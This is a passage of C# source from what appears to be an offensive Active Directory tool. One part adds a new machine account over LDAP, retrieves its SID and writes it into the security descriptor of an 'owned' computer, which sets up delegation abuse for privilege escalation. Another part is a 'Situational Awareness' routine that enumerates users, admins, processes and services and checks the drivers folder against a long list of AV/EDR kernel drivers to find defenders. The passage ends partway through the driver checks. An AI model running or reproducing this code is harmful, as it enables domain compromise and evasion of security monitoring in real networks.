                // Split each "/name:value" on its first ':'; the leading switch character is
                // dropped by Substring(1, ...). Arguments without a ':' are silently ignored.
                // IndexOf(string) is culture-sensitive here (no StringComparison given).
                Dictionary <string, string> arguments = new Dictionary <string, string>();
                foreach (string a in args)
                {
                    int i = a.IndexOf(":");
                    if (i > 0)
                    {
                        arguments[a.Substring(1, i - 1)] = a.Substring(i + 1);
                    }
                }
                // Required-argument check: usage is printed when none of computer/pass/fakecomp
                // is present, or when neither cleanup nor fakecomp is present. Note that /pass
                // and /computer are not individually required by this check, so they can still
                // be empty strings further down.
                if ((!(arguments.ContainsKey("computer")) && !(arguments.ContainsKey("pass")) && !(arguments.ContainsKey("fakecomp"))) || (!(arguments.ContainsKey("cleanup")) && !(arguments.ContainsKey("fakecomp"))))
                {
                    Usage();
                    return;
                }
                // Missing keys resolve to "" so the String.Empty comparisons below work.
                string orEmpty(string key) => arguments.ContainsKey(key) ? arguments[key] : "";

                String TargetDC      = orEmpty("dc");
                String Domain        = orEmpty("domain");
                String OwnedComp     = orEmpty("computer");
                String PasswordClear = orEmpty("pass");
                String Fake          = orEmpty("fakecomp");
                // Defaults to the literal "false"; any other value (including an empty
                // "/cleanup:") is treated as a cleanup request by the check below.
                String Cleanup       = arguments.ContainsKey("cleanup") ? arguments["cleanup"] : "false";


                // If a domain controller and domain were not provided, try to find them automatically.
                // The PDC emulator of the current domain is used as the default target DC.
                System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
                if (TargetDC == String.Empty || Domain == String.Empty)
                {
                    try
                    {
                        current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
                        if (TargetDC == String.Empty)
                        {
                            TargetDC = current_domain.PdcRoleOwner.Name;
                        }

                        if (Domain == String.Empty)
                        {
                            Domain = current_domain.Name;
                        }
                    }
                    catch
                    {
                        Console.WriteLine("[!] Cannot enumerate domain, please specify with /domain and /dc flags.");
                        return;
                    }
                }

                // Lower-cased (culture-sensitive ToLower) before being used in the DnsHostName,
                // SPN values and DN components below.
                Domain = Domain.ToLower();

                // Normalise the account name: machine_account never carries the trailing '$',
                // sam_account always does.
                String machine_account = Fake;
                String sam_account     = "";
                if (Fake.EndsWith("$"))
                {
                    sam_account     = machine_account;
                    machine_account = machine_account.Substring(0, machine_account.Length - 1);
                }
                else
                {
                    sam_account = machine_account + "$";
                }


                // Both DNs are built under the default "CN=Computers" container; the domain's DNS
                // labels become the DC= components. An owned computer that lives in another OU
                // would not be matched by victim_distinguished_name.
                String   distinguished_name        = "";
                String   victim_distinguished_name = "";
                String[] DC_array = null;

                distinguished_name        = "CN=" + machine_account + ",CN=Computers";
                victim_distinguished_name = "CN=" + OwnedComp + ",CN=Computers";
                DC_array = Domain.Split('.');

                foreach (String DC in DC_array)
                {
                    distinguished_name        += ",DC=" + DC;
                    victim_distinguished_name += ",DC=" + DC;
                }

                // Cleanup mode: only the descriptor reset on the owned computer runs (sid == null,
                // cleanup flag true); no LDAP connection of our own is opened here.
                if (Cleanup != "false")
                {
                    SetSecurityDescriptor(Domain, victim_distinguished_name, OwnedComp, null, true);
                    return;
                }

                Console.WriteLine("[+] Domain = " + Domain);
                Console.WriteLine("[+] Domain Controller = " + TargetDC);
                Console.WriteLine("[+] New SAMAccountName = " + sam_account);
                Console.WriteLine("[+] Distinguished Name = " + distinguished_name);

                // Plain LDAP on port 389; Sealing + Signing are enabled on the session before
                // Bind(), so the attribute values (including the password) are not readable on
                // the wire. Bind() is called without explicit credentials — presumably the
                // calling user's context. Detection therefore relies on DC-side auditing of
                // computer-object creation rather than on network inspection. The connection is
                // never disposed; it is released when the process exits.
                System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(TargetDC, 389);
                System.DirectoryServices.Protocols.LdapConnection          connection = null;

                connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);

                connection.SessionOptions.Sealing = true;
                connection.SessionOptions.Signing = true;
                connection.Bind();

                // Attributes for the new computer object:
                //  - userAccountControl 4096 (0x1000) is WORKSTATION_TRUST_ACCOUNT;
                //  - unicodePwd is the password wrapped in double quotes and UTF-16LE encoded,
                //    which is the format the DC expects for this attribute;
                //  - HOST/ and RestrictedKrbHost/ SPNs are registered for both the short and
                //    the FQDN form of the name.
                var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                    new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                    new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                    new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                    new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + PasswordClear + "\"")),
                    new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                    new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
                });

                // ms-DS-MachineAccountQuota is the control that limits how many such objects a
                // non-privileged principal may add; a quota of 0 makes this request fail.
                try
                {
                    connection.SendRequest(request);
                    Console.WriteLine("[+] Machine account " + machine_account + " added");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
                    Console.WriteLine("[-] Exception: " + ex.Message);
                    return;
                }

                // Get SID of the new computer object.
                // samAccountType 805306369 (0x30000001) selects machine accounts; the search is
                // rooted at the new object's own DN with subtree scope and no attribute list
                // (all attributes returned).
                var new_request        = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
                var new_response       = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
                SecurityIdentifier sid = null;

                // If the search returns no entries, sid stays null and the sid.Value access
                // below throws; that exception is reported by the outer catch.
                foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
                {
                    try
                    {
                        sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                        Console.Out.WriteLine("[+] SID of New Computer: " + sid.Value);
                    }
                    catch
                    {
                        Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                        return;
                    }
                }

                // Hands the new account's SID to the owned computer's descriptor update;
                // SetSecurityDescriptor is defined elsewhere in this file.
                SetSecurityDescriptor(Domain, victim_distinguished_name, OwnedComp, sid.Value, false);
            }

            // Catch-all: any unexpected failure is printed as a single message; nothing is
            // rethrown, so the process exit code is not affected.
            catch (Exception e)
            {
                Console.WriteLine("{0}", e.Message);
            }
        }
        static void Main(string[] args)
        {
            Console.WriteLine("=================================================================");
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("                 Situational Awareness Tool                      ");
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("=================================================================");
            string user;

            try
            {
                user = Environment.UserName;
                Console.WriteLine("Current user context: " + user);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            string domain;

            try
            {
                domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                Console.WriteLine("Domain: " + domain);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            string computername;

            try
            {
                computername = Dns.GetHostName();
                Console.WriteLine("Hostname: " + computername);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                WindowsIdentity ident     = new WindowsIdentity(Environment.UserName);
                int             initcount = 0;

                foreach (IdentityReference group in ident.Groups)
                {
                    string c = Convert.ToString(group);
                    if (c == "S-1-5-32-544")
                    {
                        initcount++;
                    }
                }


                if (initcount > 0)
                {
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.WriteLine("[!] User {0} in local admin group", Environment.UserName);
                    Console.ForegroundColor = ConsoleColor.White;
                }
                else
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("[-] User {0} NOT in local admin group", Environment.UserName);
                    Console.ForegroundColor = ConsoleColor.White;
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Local Admin Members:");
                Console.ForegroundColor = ConsoleColor.White;

                PrincipalContext local = new PrincipalContext(ContextType.Machine);

                var lclgroup = GroupPrincipal.FindByIdentity(local, "Administrators");
                PrincipalSearcher searchlcl = new PrincipalSearcher();


                PrincipalSearchResult <Principal> rslts = lclgroup.GetMembers();

                foreach (Principal k in rslts)
                {
                    Console.WriteLine(k.SamAccountName);
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] List of user accounts on {0}:", Dns.GetHostName());
                Console.ForegroundColor = ConsoleColor.White;

                PrincipalContext mycontext = new PrincipalContext(ContextType.Machine, Environment.MachineName);
                UserPrincipal    userp     = new UserPrincipal(mycontext);

                PrincipalSearcher searchp = new PrincipalSearcher();
                searchp.QueryFilter = userp;
                PrincipalSearchResult <Principal> presult = searchp.FindAll();
                foreach (Principal m in presult)
                {
                    try
                    {
                        Console.WriteLine(m.SamAccountName);
                    }
                    catch
                    {
                    }
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Internal Addresses found:");
                Console.ForegroundColor = ConsoleColor.White;
                NetworkInterface[] netinf = NetworkInterface.GetAllNetworkInterfaces();
                foreach (NetworkInterface netinf2 in netinf)
                {
                    Console.WriteLine("{0}: {1}", netinf2.Name, netinf2.GetIPProperties().UnicastAddresses[1].Address);
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Running Processes:");
                Console.ForegroundColor = ConsoleColor.White;
                Process[] listall = Process.GetProcesses();

                foreach (Process prc in listall)
                {
                    Console.WriteLine("{0} ({1})", prc.ProcessName, prc.Id);
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Running Services:");
                Console.ForegroundColor = ConsoleColor.White;
                ServiceController[] svcs;
                svcs = ServiceController.GetServices();

                foreach (ServiceController scitem in svcs)
                {
                    if (scitem.Status == ServiceControllerStatus.Running)
                    {
                        Console.WriteLine("{0}: {1}", scitem.ServiceName, scitem.DisplayName);
                    }
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Antivirus Name and ProductState Search Results:");
                Console.ForegroundColor = ConsoleColor.White;

                ManagementObjectSearcher   wmiinfo  = new ManagementObjectSearcher(@"root\SecurityCenter2", "SELECT * FROM AntiVirusProduct");
                ManagementObjectCollection wmiinfo2 = wmiinfo.Get();

                foreach (ManagementObject antivirus in wmiinfo2)
                {
                    Console.WriteLine("{0}: {1}", antivirus["displayName"], antivirus["productstate"]);
                }

                Console.WriteLine("");
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Endpoint Detection and Response Search Results:");
                Console.ForegroundColor = ConsoleColor.White;

                bool arch = Environment.Is64BitOperatingSystem;

                if (arch == true)
                {
                    DirectoryInfo driversdir = new DirectoryInfo(@"c:\windows\sysnative\drivers");

                    FileInfo[] lista = driversdir.GetFiles("*.sys");

                    foreach (FileInfo file in lista)
                    {
                        if (file.Name == "FeKern.sys" || file.Name == "WFP_MRT.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("FireEye found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "eaw.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Raytheon Cyber Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "rvsavd.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("CJSC Returnil Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "dgdmk.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Verdasys Inc. found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "mbamwatchdog.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Malwarebytes found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "edevmon.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("ESET found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SentinelMonitor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("SentinelOne found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "edrsensor.sys" || file.Name == "hbflt.sys" || file.Name == "bdsvm.sys" || file.Name == "gzflt.sys" || file.Name == "bddevflt.sys" || file.Name == "AVCKF.sys" || file.Name == "Atc.sys" || file.Name == "AVC3.SYS" || file.Name == "TRUFOS.SYS" || file.Name == "BDSandBox.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("BitDefender found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "HexisFSMonitor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Hexis Cyber Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CyOptics.sys" || file.Name == "CyProtectDrv32.sys" || file.Name == "CyProtectDrv64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cylance found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "aswSP.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Avast found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "mfeaskm.sys" || file.Name == "mfencfilter.sys" || file.Name == "epdrv.sys" || file.Name == "mfencoas.sys" || file.Name == "mfehidk.sys" || file.Name == "swin.sys" || file.Name == "hdlpflt.sys" || file.Name == "mfprom.sys" || file.Name == "MfeEEFF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("McAfee found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "groundling32.sys" || file.Name == "groundling64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Dell Secureworks found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "avgtpx86.sys" || file.Name == "avgtpx64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("AVG Technologies found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "pgpwdefs.sys" || file.Name == "GEProtection.sys" || file.Name == "diflt.sys" || file.Name == "sysMon.sys" || file.Name == "ssrfsf.sys" || file.Name == "emxdrv2.sys" || file.Name == "reghook.sys" || file.Name == "spbbcdrv.sys" || file.Name == "bhdrvx86.sys" || file.Name == "bhdrvx64.sys" || file.Name == "SISIPSFileFilter.sys" || file.Name == "symevent.sys" || file.Name == "vxfsrep.sys" || file.Name == "vxfsrep.sys" || file.Name == "VirtFile.sys" || file.Name == "SymAFR.sys" || file.Name == "symefasi.sys" || file.Name == "symefa.sys" || file.Name == "symefa64.sys" || file.Name == "SymHsm.sys" || file.Name == "evmf.sys" || file.Name == "GEFCMP.sys" || file.Name == "VFSEnc.sys" || file.Name == "pgpfs.sys" || file.Name == "fencry.sys" || file.Name == "symrg.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Symantec found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SAFE-Agent.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("SAFE-Cyberdefense found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CybKernelTracker.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("CyberArk Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "klifks.sys" || file.Name == "klifaa.sys" || file.Name == "Klifsm.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Kaspersky found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SAVOnAccess.sys" || file.Name == "savonaccess.sys" || file.Name == "sld.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Sophos found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "ssfmonm.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Webroot Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CarbonBlackK.sys" || file.Name == "carbonblackk.sys" || file.Name == "cbk7.sys" || file.Name == "cbstream.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Carbon Black found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "Parity.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Bit9 Whitelisting Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CRExecPrev.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cybereason found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "im.sys" || file.Name == "csagent.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Crowdstrike found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "cfrmd.sys" || file.Name == "cmdccav.sys" || file.Name == "cmdguard.sys" || file.Name == "CmdMnEfs.sys" || file.Name == "MyDLPMF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Comodo Security Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "PSINPROC.SYS" || file.Name == "PSINFILE.SYS" || file.Name == "amfsm.sys" || file.Name == "amm8660.sys" || file.Name == "amm6460.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Panda Security found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "fsgk.sys" || file.Name == "fsatp.sys" || file.Name == "fshs.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("F-Secure found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "esensor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Engame found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "csacentr.sys" || file.Name == "csaenh.sys" || file.Name == "csareg.sys" || file.Name == "csascr.sys" || file.Name == "csaav.sys" || file.Name == "csaam.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cisco found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "TMUMS.sys" || file.Name == "hfileflt.sys" || file.Name == "TMUMH.sys" || file.Name == "AcDriver.sys" || file.Name == "SakFile.sys" || file.Name == "SakFile.sys" || file.Name == "SakMFile.sys" || file.Name == "fileflt.sys" || file.Name == "TmEsFlt.sys" || file.Name == "tmevtmgr.sys" || file.Name == "TmFileEncDmk.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Trend Micro Inc found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "epregflt.sys" || file.Name == "medlpflt.sys" || file.Name == "dsfa.sys" || file.Name == "cposfw.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Check Point Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "psepfilter.sys" || file.Name == "cve.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Absolute found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "brfilter.sys" || file.Name == "BrCow_x_x_x_x.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Bromium found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "LRAgentMF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("LogRhythm found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "libwamf.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("OPSWAT Inc found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }
                    }
                }
                else
                {
                    DirectoryInfo driversdir = new DirectoryInfo(@"c:\windows\system32\drivers");

                    FileInfo[] listb = driversdir.GetFiles("*.sys");

                    foreach (FileInfo file in listb)
                    {
                        if (file.Name == "FeKern.sys" || file.Name == "WFP_MRT.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("FireEye found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "eaw.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Raytheon Cyber Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "rvsavd.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("CJSC Returnil Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "dgdmk.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Verdasys Inc. found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "mbamwatchdog.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Malwarebytes found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "edevmon.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("ESET found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SentinelMonitor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("SentinelOne found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "edrsensor.sys" || file.Name == "hbflt.sys" || file.Name == "bdsvm.sys" || file.Name == "gzflt.sys" || file.Name == "bddevflt.sys" || file.Name == "AVCKF.sys" || file.Name == "Atc.sys" || file.Name == "AVC3.SYS" || file.Name == "TRUFOS.SYS" || file.Name == "BDSandBox.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("BitDefender found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "HexisFSMonitor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Hexis Cyber Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CyOptics.sys" || file.Name == "CyProtectDrv32.sys" || file.Name == "CyProtectDrv64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cylance found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "aswSP.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Avast found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "mfeaskm.sys" || file.Name == "mfencfilter.sys" || file.Name == "epdrv.sys" || file.Name == "mfencoas.sys" || file.Name == "mfehidk.sys" || file.Name == "swin.sys" || file.Name == "hdlpflt.sys" || file.Name == "mfprom.sys" || file.Name == "MfeEEFF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("McAfee found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "groundling32.sys" || file.Name == "groundling64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Dell Secureworks found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "avgtpx86.sys" || file.Name == "avgtpx64.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("AVG Technologies found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "pgpwdefs.sys" || file.Name == "GEProtection.sys" || file.Name == "diflt.sys" || file.Name == "sysMon.sys" || file.Name == "ssrfsf.sys" || file.Name == "emxdrv2.sys" || file.Name == "reghook.sys" || file.Name == "spbbcdrv.sys" || file.Name == "bhdrvx86.sys" || file.Name == "bhdrvx64.sys" || file.Name == "SISIPSFileFilter.sys" || file.Name == "symevent.sys" || file.Name == "vxfsrep.sys" || file.Name == "vxfsrep.sys" || file.Name == "VirtFile.sys" || file.Name == "SymAFR.sys" || file.Name == "symefasi.sys" || file.Name == "symefa.sys" || file.Name == "symefa64.sys" || file.Name == "SymHsm.sys" || file.Name == "evmf.sys" || file.Name == "GEFCMP.sys" || file.Name == "VFSEnc.sys" || file.Name == "pgpfs.sys" || file.Name == "fencry.sys" || file.Name == "symrg.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Symantec found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SAFE-Agent.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("SAFE-Cyberdefense found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CybKernelTracker.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("CyberArk Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "klifks.sys" || file.Name == "klifaa.sys" || file.Name == "Klifsm.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Kaspersky found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "SAVOnAccess.sys" || file.Name == "savonaccess.sys" || file.Name == "sld.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Sophos found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "ssfmonm.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Webroot Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CarbonBlackK.sys" || file.Name == "carbonblackk.sys" || file.Name == "cbk7.sys" || file.Name == "cbstream.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Carbon Black found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "Parity.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Bit9 Whitelisting Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "CRExecPrev.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cybereason found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "im.sys" || file.Name == "csagent.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Crowdstrike found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "cfrmd.sys" || file.Name == "cmdccav.sys" || file.Name == "cmdguard.sys" || file.Name == "CmdMnEfs.sys" || file.Name == "MyDLPMF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Comodo Security Solutions found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "PSINPROC.SYS" || file.Name == "PSINFILE.SYS" || file.Name == "amfsm.sys" || file.Name == "amm8660.sys" || file.Name == "amm6460.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Panda Security found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "fsgk.sys" || file.Name == "fsatp.sys" || file.Name == "fshs.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("F-Secure found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "esensor.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Engame found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "csacentr.sys" || file.Name == "csaenh.sys" || file.Name == "csareg.sys" || file.Name == "csascr.sys" || file.Name == "csaav.sys" || file.Name == "csaam.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Cisco found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

